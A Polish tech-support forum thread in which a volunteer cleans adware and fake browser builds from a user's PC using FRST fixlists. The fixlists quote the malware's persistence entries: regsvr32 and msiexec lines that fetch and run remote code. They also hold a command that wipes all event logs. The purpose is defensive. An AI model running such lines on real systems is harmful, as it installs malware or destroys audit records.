MBAM wykrył ponad 10 tys. zagrożeń, bardzo wolna praca komputera na wszystkich aplikacjach

[Balooo]

Cześć,

 

komputer pracuje bardzo wolno na wszystkich aplikacjach i średnio co 30-45 sekund się zawiesza na około 30 sekund. Załączam wyniki skanu z MBAM - program znalazł ponad 10 tys. zagrożeń. Załączam również wymagane logi.|

 

Bardzo proszę o pilną pomoc.

Edytowane 16 Października 2017 przez Miszel03
Kasuje raporty z datami i log Addition z postu. //Miszel03

[Balooo]

Wyniki skanu z MBAM

 

http://wklejto.pl/299894

[Miszel03]

Raporty mają być bez dat, czyli nie z archiwalnego C:\FRST tylko z miejsca, w którym został uruchomiony FRST. 

[Balooo]

Załączam nowe logi.

 

Addition.txt

 

http://wklejto.pl/300260

 

FRST.txt

Shortcut.txt

[Miszel03]

Poproszę nowe raporty FRST, ale wygeneruj je za pomocą najnowszej wersji. 

[Balooo]

Proszę, w załączeniu najnowsze logi wygenerowane za pomocą FRST v. 11-10-2017

 

FRST.txt

 

Addition.txt

 

Shortcut.txt

[Miszel03]

Spory bałagan. Przeglądarka Google Chrome, Mozilla FireFox zostały podmienione na fałszywe, a w pozycjach startowych widać adware. Powinniśmy się z tym szybko uporać, ale pracy będzie sporo. 

 

P.S: Na przyszłość to nie sugeruj się liczbą zagrożeń, bo MBAM liczy wszystko osobno. Przykładowo: zarażony C:\Malware ma 100 plików, więc MBAM wykryje ich 101 (folder + pliki). Liczba kompletnie nie gra roli. 

 

1. Przez Panel Sterownia odinstaluj program adware / PUP: SafeFinder.

 

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1280708189-2280317887-4227462502-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) 
C:\Users\Dominika\AppData\Roaming\Bagsarah
C:\Users\Dominika\AppData\Local\Bagsarah
C:\Program Files (x86)\Bagsarah
C:\Users\Dominika\AppData\Roaming\Firefox
C:\Users\Dominika\AppData\Local\Firefox
C:\Program Files (x86)\Firefox
DeleteKey: HKCU\Software\Bagsarah
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah
DeleteKey: HKCU\Software\Firefox
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku
Task: {10C4C4D3-D694-405C-B309-DAEE641E53F7} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81RjEcMWH5NjMdMWUdNTU2RWlQN8NWRUI1OTJLOWF2RF== scrobj.dll 
Task: {B1B0AA40-3FBD-49CF-B3DC-839452D9C943} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81RjEcMWH5NjMdMWUdNTU2RWlQN8NWRUI1OTJLOWF2RF== scrobj.dll 
C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\e47bec1afdef1bd6\Google Chrome.lnk
C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
HKU\S-1-5-21-1280708189-2280317887-4227462502-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj81RjEcMWH5NjMdMWUdNTU2RWlQN8NWRUI1OTJLOWF2RF== /q 
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn5dJ8gs0DGDT3GOWsi_8CTz4dOMjrasBb05J-kqFPYL6aGkbk1a7SfBXshw_E4R5ZfAZJ2DOGVtS9jmRZOGfECXJS6H3pc1-XM8CzdfyW8TtE3oMhuaNz4M_4h85CbfMP6V2R5336pIuADtrIbfUoIA4RZu28ZKglr4zLZxxjy2WMY3W3ze8EmR&q={searchTerms}
SearchScopes: HKLM -> DefaultScope - brak wartości
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
CHR DefaultSearchURL: Default -> hxxp://feed.safefinder.biz/?fext=true&publisherid=51218&publisher=extensiondefaultap&st=ed&q={searchTerms}
CHR DefaultSearchKeyword: Default -> lp
S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X]
S2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [X]
S3 avchv; \SystemRoot\system32\DRIVERS\avchv.sys [X]
S3 dbx; system32\DRIVERS\dbx.sys [X]
S1 tcfd_vw_1_10_0_22; system32\drivers\tcfd_vw_1_10_0_22.sys [X]
2016-05-30 11:54 - 2016-05-30 11:54 - 006859776 _____ () C:\Users\Dominika\AppData\Roaming\agent.dat
2016-05-30 11:54 - 2016-05-30 11:54 - 000065616 _____ () C:\Users\Dominika\AppData\Roaming\Config.xml
2016-05-30 11:52 - 2016-05-30 11:53 - 000014448 _____ () C:\Users\Dominika\AppData\Roaming\InstallationConfiguration.xml
2016-05-30 11:52 - 2016-05-30 11:52 - 000128512 _____ () C:\Users\Dominika\AppData\Roaming\Installer.dat
2016-05-30 11:54 - 2016-05-30 11:54 - 000018432 _____ () C:\Users\Dominika\AppData\Roaming\Main.dat
2016-05-30 11:54 - 2016-05-30 11:54 - 000005568 _____ () C:\Users\Dominika\AppData\Roaming\md.xml
2016-05-30 11:54 - 2016-05-30 11:54 - 000126464 _____ () C:\Users\Dominika\AppData\Roaming\noah.dat
2016-05-30 11:54 - 2016-05-30 11:54 - 001756123 _____ () C:\Users\Dominika\AppData\Roaming\Qvo-Air.tst
2016-05-30 11:55 - 2016-05-30 11:55 - 000032038 _____ () C:\Users\Dominika\AppData\Roaming\uninstall_temp.ico
C:\Users\Dominika\Desktop\PERSONIA ZUZA\SPRZEDAŻ\OFERTY\SZKOLENIE\Szkolenia\2016\TEGRO\doskonalenie sprzedaży\doskonalenie sprzedaży — skrót.lnk
C:\Users\Dominika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wysyłanie do programu OneNote.lnk
C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Outlook.lnk
C:\Users\Dominika\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Dominika\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Dominika\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\Dominika\AppData\Local
CMD: dir /a C:\Users\Dominika\AppData\LocalLow
CMD: dir /a C:\Users\Dominika\AppData\Roaming
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} 
CMD: advfirewall reset
EmptyTemp: 

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 

 

2. Wyczyść przeglądarkę Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.

3. Wyczyść przeglądarkę Mozilla FireFox:

• Odłącz synchronizację (o ile włączona): KLIK.
• Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
• Menu Historia > Wyczyść historię przeglądania.

4. Ustaw Google Chrome lub Mozilla FireFox jako domyślną przeglądarkę - to wymagany krok, aby cofnąć modyfikacje infekcji. 

 

5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

bagsarah;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

6. Zastosuj AdwCleaner z opcji Szukaj (nie stosuj jeszcze Oczyść). Dostarcz raport z tego działania. 

 

7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

[Balooo]

ad 1. Przez Panel Sterowania nie poszło - system w ogóle nie wykrywał, że taki program jest. Poszło dopiero przez Revo Uninstaller w trybie rozszerzonym.

ad 2. fixlog.txt

 

ad 3, 4 ,5. Zrobione.

 

ad 6.  SearchReg.txt

 

ad 7. AdwCleaner[s0].txt

ad 8. FRST.txt  Addition.txt

[Miszel03]

Wszystko pomyślnie wykonane, jedziemy teraz poprawkami.

 

1. Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). Dostarcz raport z tego działania.

 

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint:
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\ChromeHTML\Capabilities|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\ChromeHTML\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\ChromeHTML\InstallInfo|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\ChromeHTML\InstallInfo|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\ChromeHTML\InstallInfo|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\ChromeHTML\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\irc\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\irc\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\mms\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\mms\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\news\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\news\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\nntp\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\nntp\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\sms\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\sms\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\smsto\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\smsto\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\tel\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\tel\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\urn\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\urn\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\webcal\DefaultIcon|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\webcal\shell\open\command|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteKey: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\323187ee_0
DeleteValue: HKEY_LOCAL_MACHINE\SYSTEM\VritualRoot\MACHINE\SOFTWARE\Comodo\HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FirefoxU|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
DeleteValue: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CmdAgent\CisConfigs\0\HIPS\Sandbox\0|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
DeleteValue: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CmdAgent\CisConfigs\0\HIPS\Sandbox\0|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
DeleteValue: HKEY_USERS\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\Capabilities|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|C:\Program Files (x86)\Firefox\uninstall\helper.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|C:\Program Files (x86)\Firefox\uninstall\helper.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|C:\Program Files (x86)\Firefox\uninstall\helper.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\shell\properties\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Mozilla\Firefox\TaskBarIDs|C:\Program Files (x86)\Firefox
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\FirefoxHTML\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\FirefoxHTML\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\FirefoxURL\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\FirefoxURL\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
CMD: netsh advfirewall reset
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 

 

3. Preferencje przeglądarki Google Chrome zostały zmodyfikowane w sposób mozolny do usunięcia ręcznie. Wymagana jest jednak kompleksowa reinstalacja przeglądarki.

• Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK.
• Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML.
• Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki.
• Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK.

4. Dostarcz plik Fixlog oraz napisz jak podsumowujesz obecną sytuację.

[Balooo]

Przepraszam za zwłokę w odpowiedzi, dobrą chwilę mnie nie było w pracy Przez czas mojej nieobecności komputer stał nietknięty, więc rozumiem, że powyższe instrukcje mają nadal zastosowanie.

1. Dwukrotnie skanowałam i oczyszczałam AdwCleanerem, ponieważ za pierwszym razem program się zawiesił. Załączam oba logi.
AdwCleaner[s1].txt    AdwCleaner[s2].txt
 

2. fixlog.txt

3. Uznałam, że na FF pracuje mi się lepiej, zatem w całości odinstalowałam Chrome przez Revo Uninstaller.

 

Obecnie komputer działa jak złoto, nie ma żadnych spowolnień przy pracy na aplikacjach - Miszel03 bardzo dziękuję!

Przed naprawą przeniosłam swoje dane na innego kompa, żeby móc jakoś pracować. Jak można się było spodziewać, w krótkim czasie zaczęły się dokładnie te same problemy, co z tym. Jak teraz bezpiecznie przenieść swoje dane na ten naprawiony komputer? W szczególności chodzi tutaj o Thunderbirda, tak żeby zachować pocztę wysłaną i ustawione foldery, filtry itd. Oraz o przeglądarkę Firefox i jej spersonalizowane ustawienia?
Naprawiony komputer będzie miał zainstalowaną Panda USB Vaccine, ale czy to jest wystarczające zabezpieczenie?

[Miszel03]

System uprzątnięty. 

 

Wszystkie detekcje AdwCleaner do kasacji - to resztki po infekcjach. Rozumiem, że już nic nie jest wykrywalne? 

 

Obecnie komputer działa jak złoto, nie ma żadnych spowolnień przy pracy na aplikacjach - Miszel03 bardzo dziękuję!

 

Miło mi to słyszeć, kończymy.

 

Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

 

Przed naprawą przeniosłam swoje dane na innego kompa, żeby móc jakoś pracować. Jak można się było spodziewać, w krótkim czasie zaczęły się dokładnie te same problemy, co z tym. Jak teraz bezpiecznie przenieść swoje dane na ten naprawiony komputer? W szczególności chodzi tutaj o Thunderbirda, tak żeby zachować pocztę wysłaną i ustawione foldery, filtry itd. Oraz o przeglądarkę Firefox i jej spersonalizowane ustawienia? Naprawiony komputer będzie miał zainstalowaną Panda USB Vaccine, ale czy to jest wystarczające zabezpieczenie?

 

Nie rozumiem. Zwykłe dane np. dokumenty Word raczej nie mogą powodować takich problemów, inne sprawa, że gdyby były zarażone... Poproszę raporty z tego komputera.

 

Całe dane wrzuć w jeden folder i przeskanuj za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

Ta szczepionka Pandy  nie wiem czy jest potrzebna. Masz dobrą ochronę od Comodo. Odsyłam do list z oprogramowaniem zabezpieczającym - znajdziesz je na forum.